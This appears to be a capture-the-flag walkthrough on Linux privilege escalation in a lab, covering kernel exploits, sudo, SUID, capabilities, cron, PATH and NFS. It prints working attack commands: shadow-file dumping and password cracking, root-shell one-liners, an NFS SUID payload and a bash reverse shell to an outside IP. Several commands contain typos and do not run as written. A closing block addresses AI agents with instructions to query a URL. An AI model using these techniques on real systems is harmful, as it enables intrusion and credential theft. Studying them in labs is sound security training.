# LineKernel
## Abdelrahman Ali Abdelaziz
Privilege escalation occurs when a computer user exploits system vulnerabilities or misconfigurations to gain access to other user accounts within a computer system. By obtaining access to these accounts, they can access additional files and execute administrative commands.
## In privilege escalations, there are two types of privilege escalations
**1. Vertical privilege escalation.**
**2. Horizontal privilege escalation.**
### Enumeration
The **`hostname`** command will return the hostname of the target machine
```
hostname
or
uname -n
```
Hostname For wade
To get the Linux Kernel Version Use **`uname -r`**
```
uname -r
```
#### python version
```
python -V
```
```
cat /etc/issuse
```
### initial Access
The kernel is the central program within a computer's operating system, holding full control over all aspects of the system. It is the part of the operating system that always remains in memory, enabling communication between hardware and software components. Typically written in a low-level language like C, the kernel is susceptible to binary exploitation techniques, which can be used to uncover vulnerabilities.
If you want to gain privilege escalation you can search for a POC using
{% code overflow="wrap" %}
```bash
cat /proc/version
uname -a
searchsploit "Linux Kernel version" or search in Google site:exploit-db.com "Linux kernel version
```
{% endcode %}
**ok I will search for the version of kernel-vulnerable**
**I found** **`CVE-2015-1328`**
* Ubuntu 14.04 - Linux ubuntu **3.13.0-24-generic** #46-Ubuntu x86\_64
{% embed url="" %}
```bash
gcc exploit.c -o exploit
```
### privEsc
### programs that the user can sudo
By running **`sudo -l`** we can see all the binaries a user can do. we first run ***sudo -l***
```bash
User karen may run the following commands on ip-10-10-202-96:
(ALL) NOPASSWD: /usr/bin/find
(ALL) NOPASSWD: /usr/bin/less
(ALL) NOPASSWD: /usr/bin/nano
```
```bash
sudo less flag2.txt
```
sudo less
To get a password Frank uses **`sudo less /etc/shadow`**
Privilege Escalation: SUID
We run the command
{% hint style="success" %}
**If the ****binary**** can lead to a ****privilege escalation**
{% endhint %}
```bash
find / -type f -perm -04000 -ls 2>/dev/null
```
i searched i google to find the privisc using base64
```bash
base64 "$LFILE" | base64 --decode
```
unshasow
```bash
unshadow pass.txt shadow.txt > passshadow.txt
john passshadow.txt
```
### Limited capabilities
Remember
{% hint style="success" %}
**If the** permission of a **binary**** can lead to a ****privilege escalation**
{% endhint %}
We search for this flaw using getcap.
```bash
getcap -r / 2>/dev/null
```
```bash
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/home/karen/vim = cap_setuid+ep
/home/ubuntu/view = cap_setuid+ep
```
i searched i google to find the privisc using capabilities
```python
vim -c `:py3 import os; os.setuid(0); os.excel("/bin/sh", "sh", "-c", "reset; exec sh")'
```
crontab
**Cron** => used to create job scheduling in Linux
first, check for crontab config
```
/etc/crontab
```
> **check all files u found check any think**
We first check /karen/backup.sh
We first modify /Karen/backup.sh since we have permission
```bash
#!/bin/bash
bash -i >& /dev/tcp/10.21.32.157/4444 0>&1
chmod 777 backup.sh
#set Revers shell in attacker
nc -nvlp 4444
```
```
unshadow pass.txt shadow.txt > passshadow.txt
john passshadow.txt
```
### Privilege Escalation: PATH
find the files writeable
```bash
find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u
```
```
export PATH=/tmp:$PATH
```
### Privilege Escalation: NFS
#### Exploiting the Network File Sharing Protocol
Network File Sharing (NFS) is a protocol allowing you to share directories and files with other Linux clients over a network
```
cat /etc/exports
```
> Read the **\_ /etc/exports \_** file, if you find some directory that is configured as **no\_root\_squash**, then you can **access** it from **as a ****client** and **write inside** that directory **as** if you were the local **ro****ot** of the machine.
{% embed url="" %}
```bash
showmount -e
```
* **Mounting that directory** in a client machine, and **as root copying** inside the mounted folder our come compiled payload that will abuse the SUID permission, give to it **SUID** rights, and **execute from the victim** machine that binary (you can find here some[ C SUID payloads](https://book.hacktricks.xyz/linux-hardening/privilege-escalation/payloads-to-execute#c)).
1. ```bash
#Attacker, as root user
gcc -static payload.c -o payload
mkdir /tmp/pe
mount -o rw : /tmp/pe
cd /tmp/pe
cp /tmp/payload
chmod +s payload
#Victim
cd
./payload
```
## Capstone Project
### Enumeration
Find the SUID
find / -type f -perm -04000 -ls 2>/dev/null
### unshadow
Password1
### su missy
### check the sudo
```
sudo -l
```
sudo Find
```bash
sudo find . -exec /bin/sh \; -quit
```
### Exploit Resources
{% embed url="" %}
### other Resources
{% embed url="" %}
{% embed url="" %}
{% embed url="" %}
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://h3ckt0r.gitbook.io/0xsec/offensive-security/oscp/writeups/thm/walkthroughs/linekernel.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.